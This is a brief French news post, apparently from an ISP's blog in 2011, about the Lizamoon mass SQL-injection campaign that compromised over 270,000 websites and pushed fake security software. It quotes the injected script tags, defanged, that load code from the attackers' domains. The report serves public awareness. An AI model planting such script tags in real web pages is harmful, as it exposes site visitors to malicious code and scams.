Opération Lizamoon

Rédigé par Clarisse de Nordnet 5 avril 2011

Une nouvelle attaque massive, baptisée Lizamoon, vient de mettre à mal plus de 270 000 sites Internet.

Les pirates injectent un code malveillant dans le code source des sites dont ils détectent une faille SQL. L’injection installe alors dans les pages du site le code suivant :

< script src = hxxp: / / lizamoon.com / ur.php > </ script> ou encore < script src = hxxp: / / books-loader .info / ur.php > </ script> ; < script src = hxxp: / / milapop .com / ur.php > </ script>.

Des liens iTunes ont également été compromis, mais Websens souligne « Heureusement, iTunes encode les balises de script, ce qui signifie que le script malveillant ne s’exécute pas sur l’ordinateur de l’utilisateur ».

En France, plusieurs dizaines de sites ont été piégés de la sorte, dont l’Astronomy Club de France et la boutique de Brigitte Lahaie. De fausses adresses cachées dans les iFrames ouvrent des publicités renvoyant sur de faux logiciels de sécurité informatique.

Article précédent

Les noms de domaine en .BE victimes de piratage

Article suivant

Des failles sur les sites d’Oracle et Asus

Laissez un commentaire Annuler la réponse

Nordnet se réserve le droit de publier ou de ne pas publier le commentaire. Le champ du commentaire n’est pas destiné à recevoir une question liée à de l’aide ou de l’assistance. Si vous avez besoin d’aide, vous pouvez consulter la page d’assistance disponible sur le site de Nordnet.com à l’adresse : https://assistance.nordnet.com/ ou contacter le service clients (appel non surtaxé) au 3420.

Ces informations sont nécessaires au traitement de votre commentaire à moins qu’elles ne soient indiquées comme étant facultatives. Elles font l’objet d’un traitement informatisé, sous la responsabilité du PDG de Nordnet chargés de l’exécution de votre demande et de toute suite qui pourraient en résulter. Conformément aux dispositions légales et réglementaires applicables, vous disposez notamment d’un droit d’accès, de rectification, d’opposition, pour des motifs légitimes, au traitement de ces informations, à la transmission à des tiers des informations vous concernant, ou à la réception d’informations commerciales. Pour exercer vos droits, veuillez adresser un courrier à Nordnet Pôle Clients – 20 rue Denis Papin – CS 20458 – 59664 Villeneuve d’Ascq Cedex, ou un courriel à l’adresse : coordonnees@nordnet.com en justifiant de votre identité et en précisant le cas échéant les coordonnées, le média et le contrat concernés (seules les demandes portant sur les données personnelles recevront une réponse). Sans préjudice des obligations de conservation, ces informations ne sont conservées, en base active, sous une forme permettant l’identification que pendant une durée qui n’excède pas la durée nécessaire aux finalités pour lesquelles elles sont collectées et traitées. En complément de ce qui précède, consultez notre politique de traitement des données à caractère personnel de Nordnet.